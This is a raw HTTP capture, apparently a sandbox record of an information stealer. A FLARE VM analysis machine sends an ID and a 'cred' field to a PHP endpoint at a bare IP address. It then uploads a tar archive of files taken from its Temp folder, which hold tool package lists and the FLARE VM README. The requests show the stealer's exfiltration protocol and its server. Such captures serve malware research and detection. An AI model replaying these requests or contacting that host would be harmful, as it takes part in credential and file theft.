POST /8vcWxwwx3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.151 Content-Length: 21 Cache-Control: no-cache id=795348421152&cred=HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 11 Jan 2023 22:18:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php 0 POST /8vcWxwwx3/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NzY4MA== Host: 62.204.41.151 Content-Length: 7840 Cache-Control: no-cache ------NzY4MA== Content-Disposition: form-data; name="data"; filename="795348421152_Desktop.tar" Content-Type: application/octet-stream Users/vm/AppData/Local/Temp/_Files_/available_packages.txt..........................................000666 .000000 .000000 .00000004254 14344065737 022125. 0....................................................................................................ustar.00................................................................000000 .000000 ..........................................................................................................................................................................0.1.0.e.d.i.t.o.r...v.m.|.1.2...0...1. . .7.z.i.p.-.1.5.-.0.5...v.m.|.1.5...0.5. . .a.p.i.m.o.n.i.t.o.r...v.m.|.2...1.3...0...2.0.2.2.0.2.2.4. . .a.p.k.t.o.o.l...v.m.|.2...7...0. . .a.s.r.e.p.r.o.a.s.t...v.m.|.0...0...0...2.0.1.8.0.9.2.5. . .b.l.o.o.d.h.o.u.n.d...v.m.|.4...2...0. . .c.a.p.a...v.m.|.4...0...1. . .c.m.d.e.r...v.m.|.1...3...2.0...2.0.2.2.1.2.0.1. . .c.o.m.m.o.n...v.m.|.0...0...0...2.0.2.2.1.2.0.1. . .c.y.b.e.r.c.h.e.f...v.m.|.9...4.9...0...2.0.2.2.1.2.0.1. . .c.y.g.w.i.n...v.m.|.3...2...0...2.0.2.2.1.2.0.1. . .d.i.e...v.m.|.3...0.2...2.0.2.2.0.1.1.3. . .d.n.s.p.y.e.x...v.m.|.6...2...0. . .e.x.p.l.o.r.e.r.s.u.i.t.e...v.m.|.0...0...0...2.0.2.2.1.1.1.5. . .f.a.k.e.n.e.t.-.n.g...v.m.|.1...4...1.1...2.0.2.2.1.1.1.5. . .f.l.a.r.e.v.m...i.n.s.t.a.l.l.e.r...v.m.|.0...0...0...2.0.2.2.1.2.0.1. . .f.l.o.s.s...v.m.|.2...1...0. . .g.h.i.d.r.a...v.m.|.1.0...1...2. . .g.o.b.u.s.t.e.r...v.m.|.3...0...1...2.0.2.2.0.1.1.3. . .h.a.s.h.m.y.f.i.l.e.s...v.m.|.0...0...0...2.0.2.2.0.1.1.3. . .i.d.a.f.r.e.e...v.m.|.7...6. . .l.i.b.r.a.r.i.e.s...p.y.t.h.o.n.2...v.m.|.0...0...0...2.0.2.2.1.2.0.3. . .l.i.b.r.a.r.i.e.s...p.y.t.h.o.n.3...v.m.|.0...0...0...2.0.2.2.1.2.0.3. . .m.a.p...v.m.|.0...2.4. . .n.e.t.w.o.r.k.m.i.n.e.r...v.m.|.2...7...3. . .n.o.t.e.p.a.d.p.l.u.s.p.l.u.s...v.m.|.8...4...7...2.0.2.2.1.1.2.9. . .n.o.t.e.p.a.d.p.p...p.l.u.g.i.n...c.o.m.p.a.r.e...v.m.|.2...0...1...2.0.2.1.1.2.2.5. . .o.l.l.y.d.b.g...o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0. . .o.l.l.y.d.b.g...v.m.|.1...1.0...0...2.0.2.2.0.9.0.8. . .o.l.l.y.d.b.g.2...o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0. . .o.l.l.y.d.b.g.2...v.m.|.2...0.1. . .p.e.i.d...v.m.|.0...9.5...0...2.0.2.2.1.1.1.5. . .p.r.o.c.e.s.s.d.u.m.p...v.m.|.2...1...1...2.0.2.2.0.9.0.8. . .r.e.g.s.h.o.t...v.m.|.1...9...1. . .r.u.n.d.o.t.n.e.t.d.l.l...v.m.|.2...2. . .s.y.s.i.n.t.e.r.n.a.l.s...v.m.|.2.0.2.2...1.1...2.8...2.0.2.2.1.2.0.1. . .u.n.i.e.x.t.r.a.c.t.2...v.m.|.2...0...0...2.0.2.2.0.1.1.3. . .v.c.b.u.i.l.d.t.o.o.l.s...v.m.|.0...0...0...2.0.2.2.1.2.0.1. . .w.i.r.e.s.h.a.r.k...v.m.|.3...6...0...2.0.2.2.1.2.0.2. . .x.6.4.d.b.g...o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0. . .x.6.4.d.b.g...v.m.|.2.0.2.1...0.5...0.8. . .x.6.4.d.b.g.p.y...v.m.|.1...0...5.6...2.0.2.1.1.0.2.1. . .....................................................................................................................................................................................................................................................................................................................................................Users/vm/AppData/Local/Temp/_Files_/failed_packages.txt.............................................000666 .000000 .000000 .00000000226 14344401701 021405. 0....................................................................................................ustar.00................................................................000000 .000000 ........................................................................................................................................................................ghidra Cygwin python3 wireshark GoogleChrome ghidra Cygwin python3 wireshark GoogleChrome ghidra Cygwin python3 wireshark GoogleChrome ..........................................................................................................................................................................................................................................................................................................................................................................Users/vm/AppData/Local/Temp/_Files_/README.txt......................................................000666 .000000 .000000 .00000003053 14344541053 017266. 0....................................................................................................ustar.00................................................................000000 .000000 ........................................................................................................................................................................ ______ _ _____ ______ __ ____ __ | ____| | / | __ | ____| / / / | | |__ | | / | |__) | |__ _____ / /| / | | __| | | / / | _ /| __|______ / / | |/| | | | | |____ / ____ | | | |____ / | | | | |_| |______/_/ __| _______| / |_| |_| M A L W A R E A N A L Y S I S E D I T I O N ________________________________________________________ Developed by FLARE (FireEye Labs Advanced Reverse Engineering) flarevm@fireeye.com ________________________________________________________ Welcome to FLARE VM - Malware Analysis Edition! The distribution contains a number of tools and configurations to enhance malware analysis and reverse engineering tasks. Please change the virtual machine network mode to Host Only to prevent malware from escaping the environment. Finally, take a snapshot so that you could always revert to a clean image. You can customize the image by downloading additional packages. For example, to install Firefox simply type the following: cinst firefox To keep the distribution up to date, restore networking to NAT or Bridge and type in the following command in the Administrator console: cup all Happy Reversing! ..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ------NzY4MA==-- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 11 Jan 2023 22:18:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive 0